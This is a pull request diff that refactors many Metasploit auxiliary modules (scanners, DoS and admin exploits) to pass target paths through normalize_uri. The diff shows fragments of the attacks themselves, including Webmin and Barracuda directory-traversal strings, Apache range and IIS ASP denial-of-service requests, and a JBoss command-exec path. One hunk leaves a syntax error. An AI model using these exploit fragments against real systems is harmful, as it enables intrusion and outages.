### PR TITLE
Set normalize uri on modules

### DIFF
--- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
+++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
@@ -79,8 +79,9 @@ class Metasploit4 < Msf::Auxiliary
 		print_status("Issuing password change request for: " + datastore['USERNAME'])
 
 		begin
+			uri = normalize_uri(datastore['TARGETURI'])
 			res = send_request_cgi({
-				'uri'     => target_uri.path,
+				'uri'     => uri,
 				'method'  => 'POST',
 				'data'    => data,
 				'headers' =>

--- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
+++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
@@ -79,7 +79,7 @@ class Metasploit4 < Msf::Auxiliary
 		print_status("Issuing password change request for: " + datastore['USERNAME'])
 
 		begin
-			uri = normalize_uri(datastore['TARGETURI'])
+			uri = normalize_uri(target_uri.path)
 			res = send_request_cgi({
 				'uri'     => uri,
 				'method'  => 'POST',

--- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
+++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_raw(
 				{
 					'method'  => 'POST',
-					'uri'     => datastore['URL'] + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
+					'uri'     => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
 				}, 25)
 
 			if (res and res.code == 500)

--- a/modules/auxiliary/admin/http/iis_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
 	def has_auth
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		res = send_request_cgi({
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def try_auth
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 		uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"
 

--- a/modules/auxiliary/admin/http/intersil_pass_reset.rb
+++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
 		@peer = "#{rhost}:#{rport}"
 		return if check != Exploit::CheckCode::Vulnerable
 
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({

--- a/modules/auxiliary/admin/http/jboss_seam_exec.rb
+++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		jbr = datastore['JBOSS_ROOT']
+		jbr = normalize_uri(datastore['JBOSS_ROOT'])
 		cmd_enc = ""
 		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
 

--- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb
+++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb
@@ -45,9 +45,10 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
+		uri = normalize_uri(target_uri.path)
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => target_uri.path,
+			'uri'       => uri,
 			'vars_post' => {
 				'tool'              => 'userprefs',
 				'newUser'           => datastore['USERNAME'],

--- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
+++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
@@ -68,6 +68,7 @@ class Metasploit4 < Msf::Auxiliary
 	# Null byte fixed in PHP 5.3.4
 	#
 
+    uri = normalize_uri(datastore['URI'])
 	case datastore['RFILE']
 	when nil
 		# Nothing
@@ -100,8 +101,7 @@ class Metasploit4 < Msf::Auxiliary
 		juhash = Digest::MD5.hexdigest(juarray)
 		juhash = juhash[0..9] # shortMD5 value for use as juhash
 
-		file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
-		file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
+		file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
 		vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
 
 		begin

--- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb
+++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb
@@ -52,7 +52,8 @@ class Metasploit3 < Msf::Auxiliary
 	def run
 		print_status("Establishing a connection to the target...")
 
-		rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
+        uri = normalize_uri(datastore['URI'])
+		rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
 
 		res = send_request_raw({
 			'uri'     => rpath,

--- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb
+++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run
 		print_status("Establishing a connection to the target...")
 
-        uri = normalize_uri(datastore['URI'])
+		uri = normalize_uri(datastore['URI'])
 		rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
 
 		res = send_request_raw({

--- a/modules/auxiliary/admin/webmin/file_disclosure.rb
+++ b/modules/auxiliary/admin/webmin/file_disclosure.rb
@@ -70,7 +70,8 @@ class Metasploit3 < Msf::Auxiliary
 	def run
 		print_status("Attempting to retrieve #{datastore['RPATH']}...")
 
-		uri = Rex::Text.uri_encode(datastore['DIR']) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
+        dir = normalize_uri(datastore['DIR'])
+		uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
 
 		res = send_request_raw({
 			'uri'            => uri,

--- a/modules/auxiliary/admin/webmin/file_disclosure.rb
+++ b/modules/auxiliary/admin/webmin/file_disclosure.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run
 		print_status("Attempting to retrieve #{datastore['RPATH']}...")
 
-        dir = normalize_uri(datastore['DIR'])
+		dir = normalize_uri(datastore['DIR'])
 		uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
 
 		res = send_request_raw({

--- a/modules/auxiliary/dos/http/apache_range_dos.rb
+++ b/modules/auxiliary/dos/http/apache_range_dos.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		ranges = ''
 		for i in (0..1299) do
 			ranges += ",5-" + i.to_s

--- a/modules/auxiliary/dos/http/hashcollision_dos.rb
+++ b/modules/auxiliary/dos/http/hashcollision_dos.rb
@@ -202,7 +202,7 @@ class Metasploit3 < Msf::Auxiliary
 			print_status("Sending request ##{x}...")
 			opts = {
 				'method'	=> 'POST',
-				'uri'		=> datastore['URL'],
+				'uri'		=> normalize_uri(datastore['URL']),
 				'data'		=> payload
 			}
 			begin

--- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
+++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
 		fmt = datastore['FORMAT'] + "XX"  # XX is 2 bytes used to mark end of memory garbage for regexp
 		begin
 			res = send_request_raw({
-				'uri' => datastore['URI'] + fmt,
+				'uri' => normalize_uri(datastore['URI']) + fmt,
 			})
 
 			if res and res.code == 200

--- a/modules/auxiliary/dos/http/webrick_regex.rb
+++ b/modules/auxiliary/dos/http/webrick_regex.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run
 		begin
 			o = {
-				'uri' => datastore['URI'] || '/',
+				'uri' => normalize_uri(datastore['URI']) || '/',
 				'headers' => {
 					'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
 				}

--- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
+++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
@@ -52,7 +52,8 @@ class Metasploit3 < Msf::Auxiliary
 
 
 	def run
-		print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{datastore['URI']}")
+		uri = normalize_uri(datastore['URI'])
+		print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")
 
 		begin
 			while(1)
@@ -60,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
 					connect
 					payload = "C=A&" * 40000
 					length = payload.size
-					sploit = "HEAD #{datastore['URI']} HTTP/1.1\r\n"
+					sploit = "HEAD #{uri} HTTP/1.1\r\n"
 					sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
 					sploit << "Connection:Close\r\n"
 					sploit << "Content-Type: application/x-www-form-urlencoded\r\n"

--- a/modules/auxiliary/fuzzers/http/http_form_field.rb
+++ b/modules/auxiliary/fuzzers/http/http_form_field.rb
@@ -484,7 +484,7 @@ class Metasploit3 < Msf::Auxiliary
 		print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']}")
 		response = send_request_raw(
 		{
-			'uri' => datastore['URL'],
+			'uri' => normalize_uri(datastore['URL']),
 			'version' => '1.1',
 			'method' => 'GET',
 			'headers' => @get_data_headers
@@ -502,7 +502,7 @@ class Metasploit3 < Msf::Auxiliary
 
 			response = send_request_raw(
 			{
-				'uri' => datastore['URL'],
+				'uri' => normalize_uri(datastore['URL']),
 				'version' => '1.1',
 				'method' => 'GET',
 				'headers' => @get_data_headers

--- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
+++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
@@ -47,8 +47,9 @@ class Metasploit3 < Msf::Auxiliary
 	def run_host(ip)
 
 		print_status("#{rhost}:#{rport} - Sending request...")
+		uri = normalize_uri(target_uri.path)
 		res = send_request_cgi({
-			'uri'          => "/#{target_uri.to_s}",
+			'uri'          => uri,
 			'method'       => 'GET',
 		})
 

--- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
+++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run_host(ip)
 
 		print_status("#{rhost}:#{rport} - Sending request...")
-		uri = normalize_uri(target_uri.path)
+		uri = normalize_uri(target_uri.to_s)
 		res = send_request_cgi({
 			'uri'          => uri,
 			'method'       => 'GET',

--- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb
+++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb
@@ -60,7 +60,8 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
-		"http://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"http://#{vhost}:#{rport}#{uri}"
 	end
 
 	def run_host(ip)
@@ -88,7 +89,8 @@ class Metasploit3 < Msf::Auxiliary
 	def do_login(user)
 
 		vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
-		payload = "#{datastore['URI']}~#{user}/"
+		uri = normalize_uri(datastore['URI'])
+		payload = "#{uri}~#{user}/"
 		begin
 			res = send_request_cgi(
 				{

--- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -58,8 +58,9 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def run_host(ip)
+		uri = normalize_uri(target_uri.path)
 		res = send_request_cgi({
-			'uri'     => target_uri.to_s,
+			'uri'     => uri,
 			'method'  => 'GET'})
 
 		if not res
@@ -71,6 +72,7 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def accessfile(rhost)
+		uri = normalize_uri(target_uri.path)
 		print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
 
 		soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -122,7 +124,7 @@ class Metasploit4 < Msf::Auxiliary
 		data << '</soap:attributes>' + "\r\n"
 
 		res = send_request_cgi({
-				'uri'      => target_uri.to_s,
+				'uri'      => uri,
 				'method'   => 'POST',
 				'ctype'    => 'text/xml; charset=UTF-8',
 				'data'     => data,

--- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -58,7 +58,7 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def run_host(ip)
-		uri = normalize_uri(target_uri.path)
+		uri = normalize_uri(target_uri.to_s)
 		res = send_request_cgi({
 			'uri'     => uri,
 			'method'  => 'GET'})
@@ -72,7 +72,7 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def accessfile(rhost)
-		uri = normalize_uri(target_uri.path)
+		uri = normalize_uri(target_uri.to_s)
 		print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
 
 		soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'

--- a/modules/auxiliary/scanner/http/axis_local_file_include.rb
+++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb
@@ -47,11 +47,12 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
-		"http://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"http://#{vhost}:#{rport}#{uri}"
 	end
 
 	def run_host(ip)
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 
 		begin
 			res = send_request_raw({
@@ -62,11 +63,11 @@ class Metasploit3 < Msf::Auxiliary
 			if (res and res.code == 200)
 				extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
 				new_uri = "/axis2/services/#{$1}"
-
+				new_uri = normalize_uri(new_uri)
 				get_credentials(new_uri)
 
 			else
-				print_status("#{target_url} - Apache Axis - The remote page not accessible")
+				print_status("#{uri} - Apache Axis - The remote page not accessible")
 				return
 
 			end
@@ -86,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary
 				'uri'     => "#{uri}" + lfi_payload,
 			}, 25)
 
-			print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
+			print_status("#{uri} - Apache Axis - Dumping administrative credentials")
 
 			if (res and res.code == 200)
 				if res.body.to_s.match(/axisconfig/)

--- a/modules/auxiliary/scanner/http/backup_file.rb
+++ b/modules/auxiliary/scanner/http/backup_file.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
 		]
 
 		bakextensions.each do |ext|
-			file = datastore['PATH']+ext
+			file = normalize_uri(datastore['PATH'])+ext
 			check_for_file(file)
 		end
 		if datastore['PATH'] =~ %r#(.*)(/.+$)#

--- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
@@ -51,11 +51,12 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
-		"http://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI']
+		"http://#{vhost}:#{rport}#{uri}"
 	end
 
 	def run_host(ip)
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		file = datastore['FILE']
 		payload = "?locale=/../../../../../../..#{file}%00"
 

--- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb
+++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
 	def run_host(ip)
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1,1] != '/'
 
 		peer = "#{ip}:#{rport}"

--- a/modules/auxiliary/scanner/http/blind_sql_query.rb
+++ b/modules/auxiliary/scanner/http/blind_sql_query.rb
@@ -141,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
 		#SEND NORMAL REQUEST
 			begin
 				normalres = send_request_cgi({
-					'uri'  		=> datastore['PATH'],
+					'uri'  		=> normalize_uri(datastore['PATH']),
 					'vars_get' 	=> gvars,
 					'method'   	=> http_method,
 					'ctype'		=> 'application/x-www-form-urlencoded',
@@ -189,7 +189,7 @@ class Metasploit3 < Msf::Auxiliary
 
 					begin
 						trueres = send_request_cgi({
-							'uri'  		=>  datastore['PATH'],
+							'uri'  		=>  normalize_uri(datastore['PATH']),
 							'vars_get' 	=>  testgvars,
 							'method'   	=>  http_method,
 							'ctype'		=> 'application/x-www-form-urlencoded',
@@ -206,7 +206,7 @@ class Metasploit3 < Msf::Auxiliary
 
 					begin
 						falseres = send_request_cgi({
-							'uri'  		=>  datastore['PATH'],
+							'uri'  		=>  normalize_uri(datastore['PATH']),
 							'vars_get' 	=>  testgvars,
 							'method'   	=>  http_method,
 							'ctype'		=> 'application/x-www-form-urlencoded',
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary
 							:port	=> rport,
 							:vhost  => vhost,
 							:ssl    => ssl,
-							:path	=> datastore['PATH'],
+							:path	=> normalize_uri(datastore['PATH']),
 							:method => http_method,
 							:pname  => key,
 							:proof  => "blind sql inj.",
@@ -272,7 +272,7 @@ class Metasploit3 < Msf::Auxiliary
 
 					begin
 						trueres = send_request_cgi({
-							'uri'  		=>  datastore['PATH'],
+							'uri'  		=>  normalize_uri(datastore['PATH']),
 							'vars_get' 	=>  gvars,
 							'method'   	=>  http_method,
 							'ctype'		=> 'application/x-www-form-urlencoded',
@@ -297,7 +297,7 @@ class Metasploit3 < Msf::Auxiliary
 
 					begin
 						falseres = send_request_cgi({
-							'uri'  		=>  datastore['PATH'],
+							'uri'  		=>  normalize_uri(datastore['PATH']),
 							'vars_get' 	=>  gvars,
 							'method'   	=>  http_method,
 							'ctype'		=> 'application/x-www-form-urlencoded',

--- a/modules/auxiliary/scanner/http/brute_dirs.rb
+++ b/modules/auxiliary/scanner/http/brute_dirs.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		conn = false
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/clansphere_traversal.rb
+++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
 	def run_host(ip)
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1,1] != '/'
 
 		peer = "#{ip}:#{rport}"

--- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb
+++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 
-		url = datastore['URL']
+		url = normalize_uri(datastore['URL'])
 		locale = "?locale="
 		trav = datastore['PATH']
 

--- a/modules/auxiliary/scanner/http/concrete5_member_list.rb
+++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb
@@ -44,12 +44,7 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def run_host(rhost)
-		# check the only one forward slash appears in the url
-		if datastore['URI'][0,1] == "/"
-			url = datastore['URI']
-		else
-			url = "/" + datastore['URI']
-		end
+		url = normalize_uri(datastore['URI'])
 
 		begin
 			res = send_request_raw({'uri' => "#{url}/index.php/members"})

--- a/modules/auxiliary/scanner/http/copy_of_file.rb
+++ b/modules/auxiliary/scanner/http/copy_of_file.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
 					]
 
 
-		tpathf = datastore['PATH']
+		tpathf = normalize_uri(datastore['PATH'])
 		testf = tpathf.split('/').last
 
 

--- a/modules/auxiliary/scanner/http/dell_idrac.rb
+++ b/modules/auxiliary/scanner/http/dell_idrac.rb
@@ -53,14 +53,16 @@ class Metasploit3 < Msf::Auxiliary
 		if rport == 443 or ssl
 			proto = "https"
 		end
-		"#{proto}://#{vhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"#{proto}://#{vhost}:#{rport}#{uri}"
 	end
 
 	def do_login(user=nil, pass=nil)
 
+		uri = normalize_uri(target_uri.path)
 		auth = send_request_cgi({
 			'method' => 'POST',
-			'uri' => target_uri.path,
+			'uri' => uri,
 			'SSL' => true,
 			'vars_post' => {
 				'user' => user,
@@ -88,10 +90,11 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 		print_status("Verifying that login page exists at #{ip}")
+		uri = normalize_uri(target_uri.path)
 		begin
 			res = send_request_raw({
 				'method' => 'GET',
-				'uri' => target_uri.path
+				'uri' => uri
 				})
 
 			if (res and res.code == 200 and res.body.to_s.match(/<authResult>1/) != nil)

--- a/modules/auxiliary/scanner/http/dir_listing.rb
+++ b/modules/auxiliary/scanner/http/dir_listing.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/dir_scanner.rb
+++ b/modules/auxiliary/scanner/http/dir_scanner.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
 		ecode = nil
 		emesg = nil
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb
+++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
 		ecode = nil
 		emesg = nil
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		@uri = target_uri
+		@uri = normalize_uri(target_uri)
 		@uri.path << "/" if @uri.path[-1, 1] != "/"
 		@peer = "#{rhost}:#{rport}"
 

--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -58,12 +58,10 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 		# Make sure the URIPATH begins with '/'
-		if datastore['PATH'][0] != '/'
-			datastore['PATH'] = '/' + datastore['PATH']
-		end
+		datastore['PATH'] = normalize_uri(datastore['PATH'])
 
 		# Make sure the URIPATH ends with /
-		if datastore['PATH'][-1] != '/'
+		if datastore['PATH'][-1,1] != '/'
 			datastore['PATH'] = datastore['PATH'] + '/'
 		end
 

--- a/modules/auxiliary/scanner/http/ektron_cms400net.rb
+++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb
@@ -50,10 +50,11 @@ class Metasploit3 < Msf::Auxiliary
 			proto = "http"
 		end
 
+		uri = normalize_uri(datastore['URI'])
 		if vhost != ""
-			"#{proto}://#{vhost}:#{rport}#{datastore['URI'].to_s}"
+			"#{proto}://#{vhost}:#{rport}#{uri.to_s}"
 		else
-			"#{proto}://#{rhost}:#{rport}#{datastore['URI'].to_s}"
+			"#{proto}://#{rhost}:#{rport}#{uri.to_s}"
 		end
 	end
 
@@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_cgi(
 			{
 				'method'  => 'GET',
-				'uri'     => datastore['URI']
+				'uri'     => normalize_uri(datastore['URI'])
 			}, 20)
 
 			#Check for HTTP 200 response.
@@ -126,7 +127,7 @@ class Metasploit3 < Msf::Auxiliary
 		begin
 			res = send_request_cgi({
 				'method'  => 'POST',
-				'uri'     => datastore['URI'],
+				'uri'     => normalize_uri(datastore['URI']),
 				'data'    => post_data,
 			}, 20)
 

--- a/modules/auxiliary/scanner/http/error_sql_injection.rb
+++ b/modules/auxiliary/scanner/http/error_sql_injection.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		if http_method == 'POST'
 			reqinfo = {
-				'uri'  		=> datastore['PATH'],
+				'uri'  		=> normalize_uri(datastore['PATH']),
 				'query' 	=> datastore['QUERY'],
 				'data' 		=> datastore['DATA'],
 				'method'   	=> http_method,
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
 			}
 		else
 			reqinfo = {
-				'uri'  		=> datastore['PATH'],
+				'uri'  		=> normalize_uri(datastore['PATH']),
 				'query' 	=> datastore['QUERY'],
 				'method'   	=> http_method,
 				'ctype'		=> 'application/x-www-form-urlencoded',
@@ -206,7 +206,7 @@ class Metasploit3 < Msf::Auxiliary
 
 					if http_method == 'POST'
 						reqinfo = {
-							'uri'  		=> datastore['PATH'],
+							'uri'  		=> normalize_uri(datastore['PATH']),
 							'query'		=> datastore['QUERY'],
 							'data' 		=> fstr,
 							'method'   	=> http_method,
@@ -215,7 +215,7 @@ class Metasploit3 < Msf::Auxiliary
 						}
 					else
 						reqinfo = {
-							'uri'  		=> datastore['PATH'],
+							'uri'  		=> normalize_uri(datastore['PATH']),
 							'query' 	=> fstr,
 							'method'   	=> http_method,
 							'ctype'		=> 'application/x-www-form-urlencoded',

--- a/modules/auxiliary/scanner/http/file_same_name_dir.rb
+++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
 			''
 		]
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 
 		if tpath.eql? "/"||""
 			print_error("Blank or default PATH set.");

--- a/modules/auxiliary/scanner/http/files_dir.rb
+++ b/modules/auxiliary/scanner/http/files_dir.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		conn = false
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] != '/'
 			tpath += '/'
 		end

--- a/modules/auxiliary/scanner/http/glassfish_login.rb
+++ b/modules/auxiliary/scanner/http/glassfish_login.rb
@@ -103,8 +103,9 @@ class Metasploit3 < Msf::Auxiliary
 		headers['Content-Type'] = ctype if ctype != nil
 		headers['Content-Length'] = data.length if data != nil
 
+		uri = normalize_uri(target_uri)
 		res = send_request_raw({
-			'uri'	  => "#{target_uri.path}#{path}".gsub(/\/\//, '/'),
+			'uri'	  => "#{uri}#{path}",
 			'method'  => method,
 			'data'	  => data,
 			'headers' => headers,
@@ -222,7 +223,8 @@ class Metasploit3 < Msf::Auxiliary
 
 		#Get GlassFish version
 		edition, version, banner = get_version(res)
-		target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
+		path = normalize_uri(datastore['PATH'])
+		target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
 		print_status("#{target_url} - GlassFish - Attempting authentication")
 
 		if (version == '2.x' or version == '9.x' or version == '3.0')

--- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
@@ -54,7 +54,7 @@ class Metasploit4 < Msf::Auxiliary
 
 	def run_host(ip)
 		@peer = "#{rhost}:#{rport}"
-		@uri = target_uri.path
+		@uri = normalize_uri(target_uri.path)
 		@uri << '/' if @uri[-1,1] != '/'
 
 		print_status("#{@peer} - Connecting to SiteScope SOAP Interface")

--- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
@@ -55,7 +55,7 @@ class Metasploit4 < Msf::Auxiliary
 
 	def run_host(ip)
 		@peer = "#{rhost}:#{rport}"
-		@uri = target_uri.path
+		@uri = normalize_uri(target_uri.path)
 		@uri << '/' if @uri[-1,1] != '/'
 
 		print_status("#{@peer} - Connecting to SiteScope SOAP Interface")

--- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
@@ -54,7 +54,7 @@ class Metasploit4 < Msf::Auxiliary
 
 	def run_host(ip)
 		@peer = "#{rhost}:#{rport}"
-		@uri = target_uri.path
+		@uri = normalize_uri(target_uri.path)
 		@uri << '/' if @uri[-1,1] != '/'
 
 		print_status("#{@peer} - Connecting to SiteScope SOAP Interface")

--- a/modules/auxiliary/scanner/http/http_put.rb
+++ b/modules/auxiliary/scanner/http/http_put.rb
@@ -124,11 +124,8 @@ class Metasploit4 < Msf::Auxiliary
 	# Main function for the module, duh!
 	#
 	def run_host(ip)
-		path   = datastore['PATH']
+		path   = normalize_uri(datastore['PATH'])
 		data   = datastore['FILEDATA']
-
-		#Add "/" if necessary
-		path = "/#{path}" if path[0,1] != '/'
 
 		if path[-1,1] != '/'
 			path += '/'

--- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb
+++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb
@@ -47,11 +47,12 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def target_url
+		uri = normalize_uri(datastore['URI'])
 		"http://#{vhost}:#{rport}#{datastore['URI']}"
 	end
 
 	def run_host(ip)
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		path_save = datastore['PATH_SAVE']
 
 		vuln_versions = [
@@ -63,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
 		begin
 			res = send_request_raw({
 				'method'  => 'GET',
